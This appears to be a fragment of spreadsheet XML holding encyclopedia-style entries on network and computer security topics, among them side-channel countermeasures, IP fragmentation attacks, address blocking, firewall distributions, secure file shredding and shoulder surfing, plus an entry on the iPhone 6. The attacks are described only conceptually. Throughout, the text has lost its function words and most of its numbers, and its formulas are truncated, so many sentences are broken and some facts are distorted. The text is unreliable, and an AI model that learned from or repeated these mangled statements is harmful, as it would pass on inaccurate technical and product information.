multiply operations draw power practically cpus, using constant execution path prevents operation-dependent power differences (differences power choosing branch another) leaking secret information. architectures instruction execution time data-dependent, pc-secure program also immune timing attacks.another code non-isochronous modern cpus memory cache: accessing infrequently used information incurs large timing penalty, revealing information frequency memory blocks. cryptographic code designed resist cache attacks attempts memory predictable fashion (such accessing input, outputs program data, according fixed pattern). example, data-dependent table lookups must avoided cache could reveal part lookup table accessed. other partial countermeasures attempt reduce amount information leaked data-dependent power differences. some operations power correlated number bits secret value. using constant-weight code (such using fredkin gates dual-rail encoding) reduce leakage information hamming weight secret value, although exploitable correlations likely remain unless balancing perfect. this "balanced design" approximated software manipulating data complement together.several "secure cpus" built asynchronous cpus; global timing reference. while cpus intended make timing power attacks difficult, subsequent research found timing variations asynchronous circuits harder remove.a typical example second category (decorrelation) technique known blinding. case decryption secret exponent {\displaystyle corresponding encryption exponent {\displaystyle modulus {\displaystyle technique applies follows (for simplicity, modular reduction omitted formulas): decrypting, computing result {\displaystyle y^{d}} given ciphertext {\displaystyle system picks random number {\displaystyle encrypts public exponent {\displaystyle obtain {\displaystyle r^{e}} then, decryption done {\displaystyle y\cdot r^{e}} obtain {\displaystyle {(y\cdot r^{e})}^{d}=y^{d}\cdot r^{e\cdot d}=y^{d}\cdot since decrypting system chose {\displaystyle compute inverse modulo {\displaystyle cancel factor {\displaystyle result obtain {\displaystyle y^{d}} actual result decryption. attacks require collecting side-channel information operations data controlled attacker, blinding effective countermeasure, since actual operation executed randomized version data, attacker control even knowledge. general countermeasure effective side-channel attacks) masking countermeasure. principle masking avoid manipulating sensitive value {\displaystyle directly, rather manipulate sharing variables (called "shares") {\displaystyle y_{1},...,y_{d}} {\displaystyle y=y_{1}\oplus ...\oplus y_{d}} (where {\displaystyle \oplus operation). attacker must recover values shares meaningful information.recently, white-box modeling utilized develop low-overhead generic circuit-level countermeasure well power side-channel attacks. minimize effects higher-level metal layers acting efficient antennas, idea embed crypto core signature suppression circuit, routed locally within lower-level metal layers, leading towards power side-channel attack immunity. also brute-force attack computer surveillance covert channel side effect references further reading books ambrose, jude (2010). power analysis side channel attacks: processor design-level context. verlag. isbn 9783836485081.{{cite book}}: maint: uses authors parameter (link) articles [1], differential power analysis, kocher, jaffe, jun, appeared crypto'99. [2], side channel attack: approach based machine learning, 2011, lerman, bontempi, markowitch. [3], timing attacks implementations diffie-hellman, rsa, dss, other systems, kocher. [4], introduction differential power analysis related attacks, 1998, kocher, jaffe, jun. nist.gov, cautionary note regarding evaluation candidates smart cards, 1999, chari, jutla, rao, rohatgi differential power analysis, goubin patarin, proceedings ches'99, lecture notes computer science 1717, springer-verlag grabher, philipp (2007). "cryptographic side-channels low-power cache memory". galbraith, steven (ed.). cryptography coding: 11th international conference, cirencester, december 18-20, 2007 proceedings, volume springer. isbn 9783540772712.{{cite book}}: maint: uses authors parameter (link) kamal, abdel alim; youssef, (2012). "fault analysis ntrusign digital signature scheme". cryptography communications. (2): 131–144. doi:10.1007/s12095-011-0061-3. s2cid 2901175. daniel genkin; shamir; eran tromer (december 2013). "rsa extraction low-bandwidth acoustic cryptanalysis". aviv university. retrieved october 2014. external links sima, mihai; brisson, andré (2015), whitenoise encryption implementation increased robustness side-channel attacks brisson, andré (2015),university victoria, british columbia side channel attack resistance study whitenoise side channel attack techniques cosade workshop international workshop constructive side-channel analysis secure design</t>
  </si>
  <si>
    <t>IP Virtual Server</t>
  </si>
  <si>
    <t>ipvs virtual server) implements transport-layer load balancing, usually called layer switching, part linux kernel. it's configured user-space utility ipvsadm(8) tool. ipvs incorporated linux virtual server (lvs), runs host acts load balancer front cluster real servers. ipvs direct requests tcp- udp-based services real servers, make services real servers appear virtual services single address. ipvs built netfilter.ipvs merged versions 2.4.x newer linux kernel mainline. also netfilter nftables network scheduler references external links source archive virtual server configuration wiki</t>
  </si>
  <si>
    <t>IP access controller</t>
  </si>
  <si>
    <t>access controller electronic security device designed identify users control entry exit protected areas using internet protocol-based technology. typical access controller supports basic access control readers. access controllers internal server configurable using browser using software installed host main features distinguish controllers older generations serial controllers are: controllers connect directly controllers inputs outputs necessary controlling readers, monitoring door inputs, controlling locks controllers on-board network interface require terminal server advantages disadvantages controllers advantages: existing network infrastructure fully utilized; need install communication lines. there limitations regarding number controllers system (the limit controllers line typical systems using rs-485 communication interface). special knowledge installation, termination, grounding troubleshooting rs-485 communication lines required. communication controllers done full network speed, important transferring data (databases thousands users, possibly including biometric records). case alarm controllers initiate connection host this ability important large systems allows reducing network traffic generated frequent polling. simplifies installation systems consisting multiple locations separated large distances. basic internet link sufficient establish connections remote locations. wide selection standard network equipment available provide connectivity different situations (fiber, wireless, vpn, dual path, poe) special hardware required building fail-over systems: case primary host fails, secondary host start polling controllers.disadvantages: system becomes susceptible network related problems, delays case heavy traffic network equipment failures. controllers workstations become accessible hackers network organization well protected. this threat eliminated physically separating access control network network organization. also controllers utilize either linux platform proprietary operating systems, makes difficult hack. industry standard data encryption also used. maximum distance switch controller meters (330 feet). operation system dependent host case host fails, events controllers retrieved functions require interaction readers (i.e. anti-passback) stop working. some controllers, however, peer-to-peer communication option order reduce dependency host unlike readers, controllers support poe. this, however, change technology improved deliver power, low-power controllers locks introduced. based current standards power carried single network cable enough reader electric strike magnetic lock, connecting controller electric locks would require power available poe. standards global also access control external links opin summary references</t>
  </si>
  <si>
    <t>IP address blocking</t>
  </si>
  <si>
    <t>address blocking, banning, configuration network service blocks requests hosts certain addresses. address blocking commonly used protect brute force attacks prevent access disruptive address. address blocking used restrict access particular geographic area, example, syndication content specific region internet geolocation blocking.ip address blocking possible many systems using hosts file. unix-like operating systems commonly implement address blocking using wrapper. proxy servers methods used bypass blocking traffic addresses. however, anti-proxy strategies available, dhcp lease renewal. works every device connected internet assigned unique address, needed enable devices communicate other. with appropriate software host website, address visitors site logged also used determine visitor's geographical location.logging address can, example, monitor person visited site before, example vote once, well monitor viewing pattern, long since performed activity site (and time limit), besides things. knowing visitor's geo-location indicates, besides things, visitor's country. cases requests responses certain country would blocked entirely. geo-blocking used, example, block shows certain countries. such censorship shows deemed inappropriate especially frequent places china.internet users circumvent geo-blocking censorship protect personal identity location stay anonymous internet using connection.on website, address block prevent disruptive address access, though warning and/or account block used first. dynamic allocation addresses isps complicate incoming address blocking, rendering difficult block specific user without blocking many addresses (blocks address ranges), thereby creating collateral damage. implementations unix-like operating systems commonly implement address blocking using wrapper, configured host access control files /etc/hosts.deny /etc/hosts.allow. both companies schools offering remote user access linux programs denyhosts fail2ban protection unauthorised access allowing permitted remote access. this also useful allowing remote access computers. also used internet censorship. address blocking possible many systems using hosts file, simple text file containing hostnames addresses. hosts files used many operating systems, including microsoft windows, linux, android, circumvention proxy servers methods used bypass blocking traffic addresses. however, anti-proxy strategies available. consumer-grade internet routers sometimes obtain public address demand internet service provider using dhcp lease renewal circumvent individual address blocks, countered blocking range addresses internet service provider assigning addresses, usually shared address prefix. however, impact legitimate users internet service provider addresses range, inadvertently creates denial-of-service attack. 2013 united states court ruling case craigslist 3taps, federal judge charles breyer held circumventing address block access website violation computer fraud abuse (cfaa) "unauthorized access", punishable civil damages. also block (internet) content-control software references external links media related address blocking wikimedia commons</t>
  </si>
  <si>
    <t>IP fragmentation attack</t>
  </si>
  <si>
    <t>fragmentation attacks kind computer security attack based internet protocol (ip) requires data transmitted processed. specifically, invokes fragmentation, process used partition messages (the service data unit (sdu); typically packet) layer network multiple smaller payloads within lower layer's protocol data unit (pdu). every network link maximum size messages transmitted, called maximum transmission unit (mtu). plus metadata added link layer exceeds mtu, must fragmented. fragmentation attacks exploit process attack vector. part tcp/ip suite internet protocol (ip) resides internet layer model. responsible transmission packets network points. includes features provide basic measures fault-tolerance (time live, checksum), traffic prioritization (type service) support fragmentation larger packets multiple smaller packets field, fragment offset). support fragmentation larger packets provides protocol allowing routers fragment packet smaller packets original packet large supporting datalink frames. fragmentation exploits (attacks) fragmentation protocol within attack vector. according [kurose 2013], type fragmentation attack "the attacker sends stream small fragments target host, none offset zero. target collapse attempts rebuild datagrams degenerate packets." another attack involves sending overlapping fragments non-aligned offsets, render vulnerable operating systems knowing causing crash. process packets encapsulated datalink frames, and, therefore, link affects larger packets forces split pieces equal smaller size. this accomplished several approaches: packet size equal smaller directly attached medium delegate fragmentation packets routers, meaning routers decide current packet re-fragmented not. this offloads work routers, also result packets segmented several routers another, resulting peculiar fragmentation. preview links source destination select smallest route, assuming unique route. this make sure fragmentation done sender, using packet-size smaller selected mtu, fragmentation route. this solution, called path discovery, allows sender fragment/segment long internet packet, rather relying routers perform ip-level fragmentation. this efficient scalable. therefore recommended method current internet. problem approach packet routed independently; well typically follow route, not, probe packet determine fragmentation follow path different paths taken later packets.three fields header used implement fragmentation reassembly. "identification", "flags" "fragment offset" fields. flags: field says packet part fragmented data frame not.bit reserved, must zero (unless packet adhering 3514) (af) fragment, don't fragment. (af) last fragment, more fragments.fragment offset specifies fragment's position within original packet, measured 8-byte units. accordingly, every fragment except last must contain multiple bytes data. obvious fragment offset hold 8192 (2^13) units packet can't 8192 65,536 bytes data "total length" field header records total size including header data. header least bytes long, maximum value "fragment offset" restricted 8189, leaves room bytes last fragment. because internet connectionless, fragments packet interleaved another destination. "identification field" uniquely identifies fragments particular packet. source system sets "identification" field packet unique value packets source address, destination address, "protocol" values, lifetime packet internet. this destination distinguish incoming fragments belong unique packet buffer last fragment received. last fragment sets "more fragment" tells receiving station start reassembling data fragments received. following real-life fragmentation example: following obtained using ethereal protocol analyzer capture icmp echo request packets. simulate open terminal type ping ip_dest 65000. results follows: note first fragment contains icmp header remaining fragments generated without icmp header. important points here: datalink protocols ethernet, first fragment contains full upper layer header, meaning fragments look like beheaded packets. additional overhead imposed network fragments contains header. additional overhead (number_of_fragments (ip_header_len); exploits fragment overlapped fragment overlapped exploit occurs fragments contained within packet offsets indicate overlap positioning within packet. this could mean either fragment completely overwritten fragment fragment partially overwritten fragment some operating systems properly handle fragments overlap manner throw exceptions behave undesirable ways upon receipt overlapping fragments. this basis teardrop attack. overlapping fragments also used attempt bypass intrusion detection systems. exploit, part attack sent fragments along additional random data; future fragments overwrite random data remainder attack. completed packet properly reassembled ids, attack undetected. fragmentation buffer full fragmentation buffer full exploit occurs excessive amount incomplete fragmented traffic detected protected network. this could excessive number incomplete fragmented packets, large number fragments individual packets combination quantity incomplete packets size/number fragments packet. this type traffic likely attempt bypass security measures intrusion detection systems intentional fragmentation attack activity. fragment overrun fragment overrun exploit reassembled fragmented packet exceeds declared data length maximum packet length. definition, packet larger 65,535 bytes. systems process large packets crash, indicative denial service attempt. fragment many packets "too many packets" exploit identified excessive number incomplete fragmented packet detected network. this usually either denial service attack attempt bypass security measures. example "too many packets", "incomplete packet" "fragment small" rose attack. fragment incomplete packet this exploit occurs packet fully reassembled missing data. this indicate denial service attack attempt defeat packet filter security policies. fragment small fragment small indicates fragment likely intentionally crafted. fragment final fragment less bytes could considered small. small fragments used denial service attacks attempt bypass security measures detection. fragmentation evasion network infrastructure equipment routers, load-balancers, firewalls inconsistent visibility fragmented packets. example, device subject initial fragment rigorous inspection auditing, might allow additional fragments pass unchecked. some attacks fact evade detection placing incriminating payload data fragments. devices operating "full" proxy mode generally susceptible subterfuge. references external links richard stevens' home page 1858</t>
  </si>
  <si>
    <t>IPFilter</t>
  </si>
  <si>
    <t>ipfilter (commonly referred ipf) open-source software package provides firewall services network address translation (nat) many unix-like operating systems. author software maintainer darren reed. ipfilter supports ipv4 ipv6 protocols, stateful firewall. ipfilter delivered freebsd, netbsd, solaris illumos, openindiana hp-ux. used part openbsd, removed theo raadt 2001 problems license. subsequently replaced openbsd developed openbsd's developers. dragonfly removed support ipfilter 2011. ipfilter installed runtime-loadable kernel module directly incorporated operating system kernel, depending specifics kernel user preferences. software's documentation recommends module approach, possible. notes also ipfw iptables (firewall) (firewall) references external links ipfilter filter phil dibowitz (2007)</t>
  </si>
  <si>
    <t>IPFire</t>
  </si>
  <si>
    <t>ipfire hardened open source linux distribution primarily performs router firewall; standalone firewall system web-based management console configuration. ipfire originally started fork ipcop rewritten basis linux from scratch since version supports installation add-ons server services, extended soho server. april 2015, project became member open invention network. system requirements basic requirements least cpu, ram, hard drive. network cards needed connect ethernet network. dsl, wi-fi (wlan) supported, too, according hardware.the required computing power ipfire depends area application. most commonly, systems used, devices, raspberry banana supported, too. ipfire used virtual environments (such kvm, vmware, xen, qemu, etc.). basic setup ipfire happens guided dialogue console, administration takes place web-based management interface, add-ons additional features. system details project regularly updated development team maintain security. developed stateful packet inspection (spi) firewall.ipfire separates network different segments based security risk organised colours. normal clients connected represented green, internet represented red, optional represented orange optional wireless network represented blue. traffic flow segments unless specifically permitted firewall rule.ipfire's package management system, called pakfire allows install system updates, keep security date, additional software packages customisation different usage scenarios needs. linux system customised concrete purpose firewall.the design modular, making functionalities extensible plugins, base comes following features stateful packet-inspection firewall based linux netfilter proxy server content filter catching-updates functions (e.g. microsoft windows updates, virus scanners, etc.) intrusion detection system (snort) option install intrusion prevention system guardian pakfire since core update features intrusion prevention system "suricata" instead snort virtual private network (vpn) ipsec openvpn dynamic host configuration protocol (dhcp) server caching name-server (supports dnssec) time server wake-on-lan (wol) dynamic quality service (qos) system monitoring functions analysis geoip filtering captive portal ipfire location ipfire project built free internet geolocation database published creative commons license. used project identify location nodes relays. also comparison firewalls list router firewall distributions references external links official website website ipfire location ipfire openhub project presentation linux magazine cebit open source 2010 german)</t>
  </si>
  <si>
    <t>IPOP</t>
  </si>
  <si>
    <t>ipop (ip-over-p2p) open-source user-centric software virtual network allowing users define create virtual private networks (vpns). ipop virtual networks provide end-to-end tunneling ethernet “tincan” links setup managed control create various software-defined overlays. history ipop started research project university florida 2006. first-generation design implementation, ipop built atop structured links managed brunet library. first design, ipop relied brunet’s structured overlay network peer-to-peer messaging, notifications, traversal, tunneling. brunet-based ipop still available open-source code; however, ipop’s architecture implementation evolved. starting september 2013, project funded national science foundation (software infrastructure sustained innovation) program enable open-source “scientific software element” research cloud computing. second-generation design ipop incorporates standards (xmpp, stun, turn) libraries (libjingle) evolved since project’s beginning create tunnels refer tincan links. current tincan-based ipop implementation based modules written c/c++ leverage libjingle create tincan links, exposing apis controller modules manage setup, creation management tincan links. enhanced modularity, controller module runs separate process c/c++ module implements tincan links communicate json-based system; thus controller written languages python. also openconnect, implements dtls-based openssh, also implements layer-2/3 "tun"-based openvpn, ssl/tls based user-space point-to-point tunneling protocol (pptp) microsoft method implementing secure socket tunneling protocol (sstp) microsoft method implementing social vpn, open-source based relationships softether vpn, open-source server program supports openvpn protocol stunnel encrypt connection (single port service) hole punching, technique establishing "connections" firewalled/nated network nodes references external links peer-to-peer-based alternatives linux magazine tutorial: deploying your overlay ipop vpns futuregrid install package network:vpn:ipop ipop google summer code 2015 ip-over-p2p project</t>
  </si>
  <si>
    <t>ShredIt</t>
  </si>
  <si>
    <t>shredit designed securely erase files variety ways, using various overwriting patterns. originally released 1998, shredit capable erasing files 10.8 later, well microsoft windows windows later ios(sublicensed burningthumb software). versions shredit available 10.6 later macos store, earlier alternate versions available mireth website. features safeplace shredding file, folder optical media overwriting standards 5220 clear 5220 sanitize secure deletion gutmann overwrite cd-rw erasure references external links official website</t>
  </si>
  <si>
    <t>IPhone 6</t>
  </si>
  <si>
    <t>iphone iphone plus smartphones designed marketed apple inc. they eighth generation iphone, succeeding iphone iphone iphone announced september 2014, released september 2014. iphone iphone plus jointly replaced flagship devices iphone series iphone iphone plus september 2015. iphone plus include larger inches (120 displays, faster processor, upgraded cameras, improved wi-fi connectivity support near field communications-based mobile payments offering.the iphone plus received positive reviews, critics regarding redesign, specifications, camera, battery life improvements previous iphone models. however, aspects design iphone also criticized, including plastic strips rear device antenna disrupted otherwise metal exterior, screen resolution standard-sized iphone lower devices class. iphone sold well, making best selling iphone model successful smartphone date. iphone plus subject several hardware issues, including prominently, susceptible bending hard pressure (dubbed "bendgate"), byproduct lack rigidity, touchscreen's internal hardware susceptible losing connection phone's logic board (nicknamed "touch disease"). additionally, iphone plus models subject camera issues, including malfunctioning optical image stabilization otherwise defects rear cameras. iphone plus moved midrange spot apple's iphone lineup iphone plus released september 2015. iphone plus discontinued markets september 2016, apple announced iphone iphone plus. their spot entry-level iphone replaced first-generation iphone released earlier march 2016. iphone relaunched storage asian markets february 2017 midrange/budget iphone. later expanded europe, hitting markets 2017, canada july 2017. iphone plus supported dropped third support five versions iphone iphone history from launch original iphone iphone iphones used 3.5-inch displays—which smaller screens used flagship phones competitors. iphone immediate successors featured display taller, width prior models, measuring inches diagonally. following apple's loss smartphone market share companies producing phones larger displays, reports early january 2014 suggested apple preparing launch iphone models larger, 4.7-inch 5.5-inch displays. reports prior unveiling also speculated apple might iphone model introduce mobile payments platform using near-field communications—a technology incorporated many android phones, experienced adoption rate among users.the iphone iphone plus officially unveiled press event flint center performing arts cupertino, california september 2014, released september 2014; pre-orders began september 2014, iphone starting us$649 iphone plus starting us$749. china, iphone first models iphone series released country international launch, apple notified local wireless carriers would unable release iphone iphone plus 19th "details ready"; local media reported devices approved ministry industry information technology, earlier year, news report state broadcaster china central television alleged iphone devices threat national security "frequent locations" function could expose "state secrets."in august 2015, apple initiated replacement program early iphone plus models found potentially faulty cameras could causing photos appear blurry.on september 2015, release iphone iphone plus, iphone plus moved mid-range iphone lineup. versions iphone iphone plus discontinued along gold version phones, versions iphone iphone plus silver space gray remain available sale reduced price.in june 2016, apple faced potential sales china, shenzhen baili, chinese device maker, alleged iphone iphone plus infringed design patent.the iphone plus discontinued september 2016, apple announced iphone iphone plus, iphone plus' spot entry-level iphone taken first-generation iphone iphone powerful internal hardware midrange iphone (largely released earlier march 2016, created unusual situation sold alongside iphone plus september despite marketed lower-tier iphone. february 2017, iphone quietly relaunched carrier stores online, time storage changed india, sold amazon's website space grey. taiwan, sold taiwan mobile march gold color. mid-march, released belarus i-store webshop. also makes appearance north america sprint based prepaid carriers boost mobile virgin mobile, along at&amp;t gophone. these distributed apple website retail stores. specifications hardware design design iphone iphone plus influenced ipad glass front curved around edges display, aluminum rear contains plastic strips antenna. back built 6000-series aluminum. both models come gold, silver, "space gray" finishes. iphone thickness millimetres (0.27 in), iphone plus (0.28 thickness; thinner iphone iphone iphone apple's thinnest phone date. displays significant changes iphone iphone plus displays; branded "retina display" "ion-strengthened", iphone display inches size 16:9 resolution 1334x750 (326 ppi, minus pixels), iphone plus includes 5.5-inch 1920x1080 (1080p) display (401 ppi). displays multiple-domain panel, dubbed "dual-domain pixels"; pixels skewed pattern every pixel seen different angle. this technique helps improve viewing angles display.to accommodate larger physical size iphone iphone plus, button renamed "side button" moved side phone instead improve accessibility. batteries iphone features 6.91 (1810 mah) battery, iphone plus features 11.1 (2915 mah) battery, neither user-replaceable. chipsets both models include apple system-on-chip, motion co-processor—an update chip iphone primary difference original coprocessor also includes barometer measure altitude changes. phil schiller said chip would provide, comparison increase performance, increase graphics performance, less heat output. early hands-on reports said a8's performance might indeed break away previous generations doubling performance yearly release, scoring 21204.26 base mark compared 20253.80, 10973.36 5034.75 respectively connectivity expanded connectivity iphone iphone plus improved advanced, support bands (seven iphone 5s), mbit/s download speed, volte support. wi-fi performance improved support 802.11ac specifications, providing speeds 433.0581 mbit/s—which three times faster 802.11n, along wi-fi calling support available. iphone iphone plus adds support near-field communications (nfc). initially used exclusively apple pay—a mobile payments system allows users store credit cards passbook online payments retail purchases nfc. added limited near-field communications besides apple party apps. camera iphone rear-facing camera ability shoot 1080p full video either frames second 720p slow-motion video either frames second, iphone could record frames second respectively. unlike previous models, rear-facing camera flush rear device, instead protrudes slightly.still photos captured video recording. those resolution four megapixels (2720×1532).the camera also includes phase detection autofocus. iphone plus camera nearly identical, also includes optical image stabilization. front-facing camera also updated sensor f/2.2 aperture, along support burst modes.however, optical image stabilization iphone plus available photography deactivated video recording.the front camera megapixels records video 720p frames second. sensors iphone plus first iphones equipped barometer sensor.like predecessor, iphone plus equipped accelerometer, gyroscope, front-facing proximity sensor digital compass. software when first released, iphone iphone plus supplied pre-loaded iphone supplied pre-loaded apps able take advantage increased screen size iphone plus display information on-screen; example, mail uses dual-pane layout similar ipad version device landscape mode iphone plus. uses identical aspect ratio, apps designed iphone iphone upscaled iphone plus. improve usability devices' larger screens, additional "reachability" gesture added; double-tapping home button slide half screen's contents bottom half screen. this function allows users reach buttons located near screen, "back" button top-left corner. june 2019, apple announced drop support iphone plus release reception both iphone models received positive reviews. re/code called "the best smartphone buy". techradar praised iphone "brilliant" design, improved battery life "smarter intuitive ever", along quality camera. however, plastic antenna strips rear phone criticized resulting poor aesthetics, display lower resolution pixel density comparison recent smartphones including physical screen size iphone one, sufficient justification significantly higher price comparison similar devices running android windows phone. verge considered iphone "simply cleanly designed" comparison noting phone still felt usable despite larger size, criticized antenna plastic, protruding camera lens (which prevents device sitting flat without case), lack additional optimization operating system bigger screen. improvements performance, battery life, volte support, tweaks also noted. conclusion, iphone considered "good, even great, there’s little that’s truly ambitious truly moving needle. it’s refinement existing ideas much pleasant package".in regards plus, engadget panned design uncomfortable hold harder grip comparison devices galaxy note praised inclusion optical image stabilization slightly better battery life 6.the iphone plus criticized forbes magazine lack 2160p (3840×2160 pixels) video recording insufficient image sensor resolution 3264×2448 pixels. however, third-party software able record footage 3264×1836 pixels upscaled 3840×2160p. issues iphone plus affected number notable hardware-related issues, including limited concerns surrounding rigidity (which incidents surrounding chassis bending, well degradation outright loss touchscreen functionality), performance issues models larger storage capacity, camera problems plus model, well initially undocumented "error appeared certain circumstances. bendgate (chassis bending) shortly public release, reported iphone iphone plus chassis susceptible bending pressure, carried tightly user's pocket. while issues exclusive iphone plus, design flaw came known among users media "bendgate".apple responded bending allegations, stating received nine complaints bent devices damage occurring regular "extremely rare." company maintained iphone plus went durability testing ensure would stand daily use. company offered replace phones bent determined bending unintentional.in 2018, part lawsuit apple regarding touchscreen failure, revealed internal documents apple knew iphone plus phones likely bend previous models. according court documents, apple's internal tests found iphone times likely bend iphone larger iphone plus times likely bend. hair ripping october 2014 9to5mac released post claiming certain iphone iphone plus users complained social networking sites phone ripped hair held phone close ears making phone calls. twitter users claimed seam glass screen aluminum back iphone blame, hair becoming caught within flash storage performance some users reported iphone models experienced performance issues, iphone plus models would, rare cases, randomly crash reboot. business korea reported issues connected triple-level cell nand storage affected models. triple-level nand flash store three bits data cell flash, cheaper dual-level cell solutions, cost performance. reported apple planned switch affected model lines back multi-level cell flash, address performance issues existing devices future update. iphone plus camera issues reported optical image stabilization systems iphone plus models faulty, failing properly stabilize phone held perfectly still, leading blurry photos "wavy"-looking videos. optical image stabilization system also found affected accessories magnets, third-party lens attachments; apple issued advisories users licensed accessory makers, warning magnetic metallic accessories cause malfunction.on august 2015, apple instituted repair program iphone plus models released september 2014 january 2015, citing faulty rear cameras affected models produce blurry pictures.some iphone iphone plus models issue front-facing camera somehow "shifted", place. apple stated would replace affected iphone models issue, free charge. despite numerous complaints regarding issue, seem affect camera itself. said camera shifted, piece protective foam around camera module gone place. "error iphone home button repaired modified third party, device fail security checks related touch components "re-validated" security reasons—a process performed authorized apple outlet. failing checks disables features related touch such effects sometimes happened result damage well.it reported hardware integrity checks would trigger unrecoverable loop "recovery mode" updated restored, attempts restore device itunes software resulting "error message. beyond explanation related hardware integrity errors regarding touch components, apple provided official explanation specifically triggers error fixed without replacing entire device.on february 2016, apple released 9.2.1 patch itunes addresses issue admitted error actually related diagnostic check inspecting touch hardware iphone shipped factories. touchscreen failure ("touch disease") touchscreen control components iphone logic boards insufficient support, including lack underfill—which strengthens stabilizes integrated circuits, lack rigid metal shielding logic board unlike previous iphone models; touchscreen controller instead shielded flexible "sticker". normal device cause logic board flex internally, strains touchscreen connectors leads degradation outright loss touchscreen functionality. symptom associated type failure flickering grey near display. ifixit reported issue, nicknamed "touch disease", byproduct previous "bendgate" design flaw device's demonstrated lack rigidity. such, larger iphone plus susceptible flaw, also reported small percentage iphone models. devices' successor, iphone afflicted flaw changes internal design, included strengthening "key points" rear casing, re-location touchscreen controllers display assembly logic board.initially, apple officially acknowledge issue. issue widely discussed apple's support forum—where posts discussing issue subject censorship. touchscreen repaired microsoldering: apple stores equipped tools needed perform logic board repair, affected users sending devices unofficial, third-party repair services. apple store employee interviewed apple insider reported months first started noticing problem, apple issued guidance instructing tell affected users hardware issue could repaired iphone replaced. however, in-stock units also afflicted issue box, leading employee stating "tired pulling service stock box, seeing exact problem customer replacement". issue received mainstream attention august 2016 reported ifixit. august 2016, apple insider reported based data four "high-traffic" apple store locations, spike number iphone devices brought repairs following mainstream reports "touch disease" problem.on august 2016, group three iphone owners sued apple inc. united states district court northern district california filed proposed class action lawsuit, alleging apple engaging unfair business practices "long aware" defective design, refusing acknowledge repair it.on november 2016, apple officially acknowledged issue announced paid repair program affected iphone plus models, stating; "some iphone plus devices exhibit display flickering multi-touch issues dropped multiple times hard surface incurring stress device". sales apple inc. announced, within hours availability, million pre-orders iphone plus made, exceeding supply available—an apple record. million iphone iphone plus devices sold first three days, marking another apple record. iphone plus introduced september 2015 selling million units record sales first three days last years release. three months release, iphone generated 71.5 million unit sales.as june 2017, iphone plus sold 222.4 million units worldwide, making popular iphone models best-selling smartphones time. also list ipados devices history iphone comparison smartphones list best-selling mobile phones timeline iphone models notes references</t>
  </si>
  <si>
    <t>Shred (Unix)</t>
  </si>
  <si>
    <t>shred command unix-like operating systems used securely delete files devices extremely difficult recover them, even specialized hardware technology; assuming even possible recover file all.1 part core utilities. background efficiency, process erasing file storage using command usually erases file's file-system entry keeping content file intact. this frequently allows commonly available software recover "erased" file's data. file data stored magnetic media hdd, even file overwritten, residual magnetic fields allow data recovery using specialist hardware equipment. prevent this, shred overwrites contents file multiple times, using patterns chosen maximize destruction residual data. features shred invoked either ordinary files devices (such hard disk partitions), represented files unix. default, command overwrites file three times multiple patterns, number user configurable. option additional final overwrite zeroes, help hide fact used. default, shred also shreds file slack (unused space file allocations). example, file file system clusters actually requires storage. shred option overwrite file itself, well option delete file completed operation. limitations limitation shred invoked ordinary files overwrites data place without overwriting copies file. copies manifest variety ways, manual automatic backups, file system snapshots, copy-on-write filesystems, wear leveling flash drives, caching caching, journaling. limitations imposed file system overcome shredding every device data resides instead specific files. however, since wear leveled devices guarantee fixed relationship logical blocks addressable interface physical locations data stored, shredding provide adequate security. available, sata secure erase command, issued hdparm similar utility, helpful situation. even magnetic devices, sata secure erase faster reliable shredding. physical destruction necessary securely erase devices memory cards unusable hard disks. alternatives scrub command overwrite sequence data compliant dec. 2005 draft national nuclear security administration policy letter nap-14.x. references shred invocation, coreutils. accessed february 2009. shred secure-delete, free software magazine. november 2008. accessed february 2009. secure erase definition, about.com. accessed april 2012. completely erase hard drive, about.com. accessed april 2012. notes data remanence article provides citations publications investigate security shredding. external links shred(1) linux user commands manual</t>
  </si>
  <si>
    <t>Shoulder surfing (computer security)</t>
  </si>
  <si>
    <t>computer security, shoulder surfing type social engineering technique used obtain information personal identification numbers (pins), passwords confidential data looking victim's shoulder. unauthorized users watch keystrokes inputted device listen sensitive information spoken, also known eavesdropping. methods history this attack performed either close range directly looking victim's shoulder) longer range with, example pair binoculars similar hardware. attackers need technical skills order perform method, keen observation victims' surroundings typing pattern sufficient. early 1980s, shoulder surfing practiced near public phones steal calling card digits make long-distance calls sell market cheaper prices original purchaser paid. however, advent modern-day technologies like hidden cameras secret microphones makes shoulder surfing easier gives attacker scope perform long range shoulder surfing. hidden camera allows attacker capture whole login process confidential data victim, ultimately could lead financial loss identity theft. shoulder surfing likely occur crowded places easier observe information without getting victim's attention. there types shoulder-surfing attack: direct observation attacks, authentication information obtained person directly monitoring authentication sequence, recording attacks, authentication information obtained recording authentication sequence later analysis open device. apart threats password entry, shoulder surfing also occurs daily situations uncover private content handheld mobile devices; shoulder surfing visual content found leak sensitive information user even private information third-parties. countermeasures gaze-based password entry basic procedure gaze-based password entry similar normal password entry, except place typing touching screen, user looks desired character trigger region sequence (same typing). approach can, therefore, used character-based passwords using on-screen keyboard graphical password schemes surveyed variety considerations important ensuring usability security. tracking technology come long since origins early 1900s. state trackers offers non-encumbering, remote video-based tracking accuracy visual angle. trackers specialized application computer vision. camera used monitor user's eyes. infrared light sources illuminate user's face produce glint reflection light source cornea. user looks different directions pupil moves location glint cornea remains fixed. relative motion position center pupil glint used estimate gaze vector, mapped coordinates screen plane. researchers proposed ways counter shoulder surfing mobile devices leveraging front-facing camera gaze-based password entry. example, gazetouchpin gazetouchpass combine gaze input form movements left/right, touch input tapping on-screen buttons. these methods secure traditional touch-based input (e.g., lock patterns) require shoulder surfers observe user's eyes, observe user's touch input, combine observations. painting album mechanism painting album mechanism anti-shoulder surfing mechanism, characteristics recall recognition graphical techniques. rather using regular password involving alphanumeric characters, users select remembered colour picture (selected "favourite picture" setup system) unlock system. this anti-shoulder surfing security method developed based survey results users' affinity choices, observation children paint pictures. resulting mechanism developed survey user choices, outcome created three input schemes, named swipe scheme, colour scheme, scot scheme, methods password creation. each input scheme identical, user choose input scheme prefer. swipe scheme implemented microsoft windows later versions, known picture password; however drawn criticism requiring user secure enough gesture. secret method access sensitive information risk shoulder surfing, secret method technique expose authentication information entry, even individuals view input process. additionally, risk camera recordings also poses threat. therefore, necessary make authentication process complex order prevent authentication information smartphones, biometrics fingerprint scanning facial recognition, cannot replicated shoulder surfer. secret authentication method icons form system. goals secret system are: covert observation resistance: maintain resistance strength level prevents authentication information revealed individuals, even authentication operation performed numerous times. recording attack resistance: maintain resistance strength level prevents authentication information analyzed individuals even authentication operation fully recorded. brute-force attack resistance: maintain resistance strength level prevents authentication process broken easily brute-force attack four digit pin. this policy follows standard forth 9564-1. usability: maintain level usability permits operators perform authentication operation ease. comparison risks alphanumeric graphical passwords primary benefit graphical passwords compared alphanumeric passwords 